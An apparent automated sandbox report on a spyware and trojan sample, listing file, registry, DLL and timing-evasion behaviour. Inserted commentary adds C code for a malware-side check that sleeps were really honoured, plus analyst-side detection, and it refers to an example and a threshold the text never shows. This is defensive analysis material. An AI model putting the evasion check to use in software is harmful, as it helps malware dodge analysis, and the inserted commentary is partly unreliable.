Source: Fa24c148.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/10@5/5
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00404457 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404457
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Program Files (x86)\shaw
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack
Source: C:\Users\user\Desktop\Fa24c148.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Users\user\AppData\Local\Temp\nsjC8A7.tmp
Source: Fa24c148.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Fa24c148.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Fa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Fa24c148.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\Fa24c148.exe File read: C:\Users\user\Desktop\Fa24c148.exe
Source: unknown Process created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"
Source: C:\Users\user\Desktop\Fa24c148.exe Process created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"
Source: C:\Users\user\Desktop\Fa24c148.exe Process created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Fa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation

Source: Yara match File source: 00000000.00000002.2029869938.0000000005425000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Fa24c148.exe API/Special instruction interceptor: Address: 5C2938D
Source: C:\Users\user\Desktop\Fa24c148.exe API/Special instruction interceptor: Address: 1FA938D
Source: C:\Users\user\Desktop\Fa24c148.exe RDTSC instruction interceptor: First address: 5BEAA11 second address: 5BEAA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4458D311FAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fa24c148.exe RDTSC instruction interceptor: First address: 1F6AA11 second address: 1F6AA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4458FAFEFAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fa24c148.exe Memory allocated: 120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Memory allocated: 335C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Memory allocated: 33230000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595967 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595516 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595391 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594813 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594359 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594250 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594141 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Window / User API: threadDelayed 7648 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Window / User API: threadDelayed 2183 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Fa24c148.exe API coverage: 1.7 %
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -25825441703193356s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 4484 Thread sleep count: 7648 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 4484 Thread sleep count: 2183 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595967s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595967 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595516 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595391 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594813 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594359 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594250 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594141 Jump to behavior
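The delay series above starts at 600000 ms (10 minutes) and shrinks by roughly 110 to 125 ms per call (600000, 599875, 599766, ...), which is what a loop that re-issues a wait for the remaining time looks like in a behaviour log; the 922337203685477 ms value is an effectively infinite wait. A sandbox that simply fast-forwards Sleep would get past this in no time, so loaders commonly compare the wall clock before and after the request to detect exactly that. Added example, not code from the sample or this report: the malware-side "was my sleep honoured" check in C, together with analyst-side logic that flags a countdown series like the one listed here. The delay values fed to the checker are copied from the report; the thresholds and the benign counter-example are assumptions.

```c
#define _POSIX_C_SOURCE 199309L
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* Monotonic clock in nanoseconds; a hooked Sleep() cannot move this forward. */
static uint64_t now_ns(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

static void sleep_ms(uint32_t ms) {
    struct timespec req = { (time_t)(ms / 1000), (long)(ms % 1000) * 1000000L };
    while (nanosleep(&req, &req) != 0) { /* restart after a signal */ }
}

/* Malware-side check: request a delay and verify the clock really advanced.
 * A sandbox that fast-forwards sleeps returns at once, so elapsed << request.
 * Returns 1 when the delay was honoured; 1 ms tolerance covers rounding. */
int sleep_was_honoured(uint32_t request_ms) {
    uint64_t t0 = now_ns();
    sleep_ms(request_ms);
    uint64_t elapsed_ms = (now_ns() - t0) / 1000000ull;
    return elapsed_ms + 1 >= request_ms ? 1 : 0;
}

/* Analyst-side check over a behaviour log: a strictly decreasing run of
 * requested delays whose first value is at least min_first_ms is the
 * fingerprint of a "wait for whatever time is left" countdown loop. */
int is_countdown_series(const uint32_t *delays, size_t n, uint32_t min_first_ms) {
    if (n < 2 || delays[0] < min_first_ms) return 0;
    for (size_t i = 1; i < n; i++)
        if (delays[i] >= delays[i - 1]) return 0;
    return 1;
}

/* Values copied from the "Thread delayed" lines of this report. */
const uint32_t report_delays[] = { 600000, 599875, 599766, 599656, 599547, 599438 };
const size_t report_delay_count = sizeof report_delays / sizeof report_delays[0];
/* Constructed counter-example: short, non-monotonic delays of an ordinary program. */
const uint32_t benign_delays[] = { 100, 250, 100 };
const size_t benign_delay_count = sizeof benign_delays / sizeof benign_delays[0];

int main(void) {
    const uint32_t three_minutes_ms = 180000; /* the report's ">= 3 min" threshold */
    printf("sleep honoured: %d\n", sleep_was_honoured(50));
    printf("report series is countdown: %d\n",
           is_countdown_series(report_delays, report_delay_count, three_minutes_ms));
    printf("benign series is countdown: %d\n",
           is_countdown_series(benign_delays, benign_delay_count, three_minutes_ms));
    return 0;
}
```

The two halves are the same observation from opposite sides: the loader wants the elapsed time to match the request, the sandbox wants to skip the wait without the loader noticing. Sandboxes that patch sleeps therefore also have to advance every clock the sample can read (GetTickCount, QueryPerformanceCounter, the TSC from the previous example, even NTP responses), and a report line such as "Thread sleep time: -600000s >= -30000s" is the sandbox recording that it did so.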
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWhMw
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Users\user\Desktop\Fa24c148.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Fa24c148.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
